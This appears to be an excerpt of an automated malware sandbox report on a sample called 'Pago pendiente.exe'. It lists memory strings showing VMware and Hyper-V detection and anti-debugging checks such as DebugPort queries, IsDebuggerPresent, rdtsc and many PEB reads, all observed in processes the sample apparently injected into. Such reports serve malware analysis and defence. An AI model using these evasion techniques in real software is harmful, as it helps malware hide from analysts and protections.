          Source: explorer.exe, 00000006.00000003.3096752770.0000000009C92000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000006.00000000.2020705290.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
          Source: explorer.exe, 00000006.00000000.2026275554.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
          Source: explorer.exe, 00000006.00000003.3096490276.0000000009BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000006.00000003.3789657905.0000000009BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
          Source: explorer.exe, 00000006.00000003.3096752770.0000000009C92000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000002.4448347462.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
          Source: explorer.exe, 00000006.00000003.3095397354.0000000003554000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
          Source: explorer.exe, 00000006.00000003.3096752770.0000000009C92000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: Pago pendiente.exe, 00000000.00000002.2006572080.0000000001341000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000006.00000000.2011068724.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
          Source: explorer.exe, 00000006.00000003.3095397354.0000000003554000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000006.00000000.2020705290.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
          Source: Pago pendiente.exe, 00000000.00000002.2006572080.0000000001341000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: explorer.exe, 00000006.00000000.2026275554.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000006.00000003.3095397354.0000000003554000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000006.00000003.3095397354.0000000003554000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
          Source: explorer.exe, 00000006.00000003.3096490276.0000000009BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
          Source: explorer.exe, 00000006.00000003.3096752770.0000000009C92000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
          Source: explorer.exe, 00000006.00000000.2011068724.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000006.00000002.4448347462.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000002.4445926904.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00409AB0 rdtsc 5_2_00409AB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0040ACF0 LdrLoadDll,5_2_0040ACF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_000669F5 IsDebuggerPresent,7_2_000669F5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C4144 mov eax, dword ptr fs:[00000030h]5_2_014C4144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C4144 mov eax, dword ptr fs:[00000030h]5_2_014C4144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C4144 mov ecx, dword ptr fs:[00000030h]5_2_014C4144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C4144 mov eax, dword ptr fs:[00000030h]5_2_014C4144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C4144 mov eax, dword ptr fs:[00000030h]5_2_014C4144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142C156 mov eax, dword ptr fs:[00000030h]5_2_0142C156
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C8158 mov eax, dword ptr fs:[00000030h]5_2_014C8158
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01436154 mov eax, dword ptr fs:[00000030h]5_2_01436154
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01436154 mov eax, dword ptr fs:[00000030h]5_2_01436154
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01504164 mov eax, dword ptr fs:[00000030h]5_2_01504164
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01504164 mov eax, dword ptr fs:[00000030h]5_2_01504164
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DE10E mov eax, dword ptr fs:[00000030h]5_2_014DE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DE10E mov ecx, dword ptr fs:[00000030h]5_2_014DE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DE10E mov eax, dword ptr fs:[00000030h]5_2_014DE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DE10E mov eax, dword ptr fs:[00000030h]5_2_014DE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DE10E mov ecx, dword ptr fs:[00000030h]5_2_014DE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DE10E mov eax, dword ptr fs:[00000030h]5_2_014DE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DE10E mov eax, dword ptr fs:[00000030h]5_2_014DE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DE10E mov ecx, dword ptr fs:[00000030h]5_2_014DE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DE10E mov eax, dword ptr fs:[00000030h]5_2_014DE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DE10E mov ecx, dword ptr fs:[00000030h]5_2_014DE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DA118 mov ecx, dword ptr fs:[00000030h]5_2_014DA118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DA118 mov eax, dword ptr fs:[00000030h]5_2_014DA118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DA118 mov eax, dword ptr fs:[00000030h]5_2_014DA118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DA118 mov eax, dword ptr fs:[00000030h]5_2_014DA118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F0115 mov eax, dword ptr fs:[00000030h]5_2_014F0115
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01460124 mov eax, dword ptr fs:[00000030h]5_2_01460124
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F61C3 mov eax, dword ptr fs:[00000030h]5_2_014F61C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F61C3 mov eax, dword ptr fs:[00000030h]5_2_014F61C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014AE1D0 mov eax, dword ptr fs:[00000030h]5_2_014AE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014AE1D0 mov eax, dword ptr fs:[00000030h]5_2_014AE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014AE1D0 mov ecx, dword ptr fs:[00000030h]5_2_014AE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014AE1D0 mov eax, dword ptr fs:[00000030h]5_2_014AE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014AE1D0 mov eax, dword ptr fs:[00000030h]5_2_014AE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_015061E5 mov eax, dword ptr fs:[00000030h]5_2_015061E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014601F8 mov eax, dword ptr fs:[00000030h]5_2_014601F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01470185 mov eax, dword ptr fs:[00000030h]5_2_01470185
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014EC188 mov eax, dword ptr fs:[00000030h]5_2_014EC188
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014EC188 mov eax, dword ptr fs:[00000030h]5_2_014EC188
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014D4180 mov eax, dword ptr fs:[00000030h]5_2_014D4180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014D4180 mov eax, dword ptr fs:[00000030h]5_2_014D4180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B019F mov eax, dword ptr fs:[00000030h]5_2_014B019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B019F mov eax, dword ptr fs:[00000030h]5_2_014B019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B019F mov eax, dword ptr fs:[00000030h]5_2_014B019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B019F mov eax, dword ptr fs:[00000030h]5_2_014B019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142A197 mov eax, dword ptr fs:[00000030h]5_2_0142A197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142A197 mov eax, dword ptr fs:[00000030h]5_2_0142A197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142A197 mov eax, dword ptr fs:[00000030h]5_2_0142A197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01432050 mov eax, dword ptr fs:[00000030h]5_2_01432050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B6050 mov eax, dword ptr fs:[00000030h]5_2_014B6050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145C073 mov eax, dword ptr fs:[00000030h]5_2_0145C073
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B4000 mov ecx, dword ptr fs:[00000030h]5_2_014B4000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014D2000 mov eax, dword ptr fs:[00000030h]5_2_014D2000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014D2000 mov eax, dword ptr fs:[00000030h]5_2_014D2000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014D2000 mov eax, dword ptr fs:[00000030h]5_2_014D2000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014D2000 mov eax, dword ptr fs:[00000030h]5_2_014D2000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014D2000 mov eax, dword ptr fs:[00000030h]5_2_014D2000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014D2000 mov eax, dword ptr fs:[00000030h]5_2_014D2000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014D2000 mov eax, dword ptr fs:[00000030h]5_2_014D2000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014D2000 mov eax, dword ptr fs:[00000030h]5_2_014D2000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144E016 mov eax, dword ptr fs:[00000030h]5_2_0144E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144E016 mov eax, dword ptr fs:[00000030h]5_2_0144E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144E016 mov eax, dword ptr fs:[00000030h]5_2_0144E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144E016 mov eax, dword ptr fs:[00000030h]5_2_0144E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142A020 mov eax, dword ptr fs:[00000030h]5_2_0142A020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142C020 mov eax, dword ptr fs:[00000030h]5_2_0142C020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C6030 mov eax, dword ptr fs:[00000030h]5_2_014C6030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B20DE mov eax, dword ptr fs:[00000030h]5_2_014B20DE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142A0E3 mov ecx, dword ptr fs:[00000030h]5_2_0142A0E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014380E9 mov eax, dword ptr fs:[00000030h]5_2_014380E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B60E0 mov eax, dword ptr fs:[00000030h]5_2_014B60E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142C0F0 mov eax, dword ptr fs:[00000030h]5_2_0142C0F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014720F0 mov ecx, dword ptr fs:[00000030h]5_2_014720F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143208A mov eax, dword ptr fs:[00000030h]5_2_0143208A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014280A0 mov eax, dword ptr fs:[00000030h]5_2_014280A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C80A8 mov eax, dword ptr fs:[00000030h]5_2_014C80A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F60B8 mov eax, dword ptr fs:[00000030h]5_2_014F60B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F60B8 mov ecx, dword ptr fs:[00000030h]5_2_014F60B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B2349 mov eax, dword ptr fs:[00000030h]5_2_014B2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B2349 mov eax, dword ptr fs:[00000030h]5_2_014B2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B2349 mov eax, dword ptr fs:[00000030h]5_2_014B2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B2349 mov eax, dword ptr fs:[00000030h]5_2_014B2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B2349 mov eax, dword ptr fs:[00000030h]5_2_014B2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B2349 mov eax, dword ptr fs:[00000030h]5_2_014B2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B2349 mov eax, dword ptr fs:[00000030h]5_2_014B2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B2349 mov eax, dword ptr fs:[00000030h]5_2_014B2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B2349 mov eax, dword ptr fs:[00000030h]5_2_014B2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B2349 mov eax, dword ptr fs:[00000030h]5_2_014B2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B2349 mov eax, dword ptr fs:[00000030h]5_2_014B2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B2349 mov eax, dword ptr fs:[00000030h]5_2_014B2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B2349 mov eax, dword ptr fs:[00000030h]5_2_014B2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B2349 mov eax, dword ptr fs:[00000030h]5_2_014B2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B2349 mov eax, dword ptr fs:[00000030h]5_2_014B2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B035C mov eax, dword ptr fs:[00000030h]5_2_014B035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B035C mov eax, dword ptr fs:[00000030h]5_2_014B035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B035C mov eax, dword ptr fs:[00000030h]5_2_014B035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B035C mov ecx, dword ptr fs:[00000030h]5_2_014B035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B035C mov eax, dword ptr fs:[00000030h]5_2_014B035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B035C mov eax, dword ptr fs:[00000030h]5_2_014B035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FA352 mov eax, dword ptr fs:[00000030h]5_2_014FA352
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014D8350 mov ecx, dword ptr fs:[00000030h]5_2_014D8350
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0150634F mov eax, dword ptr fs:[00000030h]5_2_0150634F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014D437C mov eax, dword ptr fs:[00000030h]5_2_014D437C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146A30B mov eax, dword ptr fs:[00000030h]5_2_0146A30B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146A30B mov eax, dword ptr fs:[00000030h]5_2_0146A30B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146A30B mov eax, dword ptr fs:[00000030h]5_2_0146A30B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142C310 mov ecx, dword ptr fs:[00000030h]5_2_0142C310
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01450310 mov ecx, dword ptr fs:[00000030h]5_2_01450310
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01508324 mov eax, dword ptr fs:[00000030h]5_2_01508324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01508324 mov ecx, dword ptr fs:[00000030h]5_2_01508324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01508324 mov eax, dword ptr fs:[00000030h]5_2_01508324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01508324 mov eax, dword ptr fs:[00000030h]5_2_01508324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014EC3CD mov eax, dword ptr fs:[00000030h]5_2_014EC3CD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143A3C0 mov eax, dword ptr fs:[00000030h]5_2_0143A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143A3C0 mov eax, dword ptr fs:[00000030h]5_2_0143A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143A3C0 mov eax, dword ptr fs:[00000030h]5_2_0143A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143A3C0 mov eax, dword ptr fs:[00000030h]5_2_0143A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143A3C0 mov eax, dword ptr fs:[00000030h]5_2_0143A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143A3C0 mov eax, dword ptr fs:[00000030h]5_2_0143A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014383C0 mov eax, dword ptr fs:[00000030h]5_2_014383C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014383C0 mov eax, dword ptr fs:[00000030h]5_2_014383C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014383C0 mov eax, dword ptr fs:[00000030h]5_2_014383C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014383C0 mov eax, dword ptr fs:[00000030h]5_2_014383C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B63C0 mov eax, dword ptr fs:[00000030h]5_2_014B63C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DE3DB mov eax, dword ptr fs:[00000030h]5_2_014DE3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DE3DB mov eax, dword ptr fs:[00000030h]5_2_014DE3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DE3DB mov ecx, dword ptr fs:[00000030h]5_2_014DE3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DE3DB mov eax, dword ptr fs:[00000030h]5_2_014DE3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014D43D4 mov eax, dword ptr fs:[00000030h]5_2_014D43D4
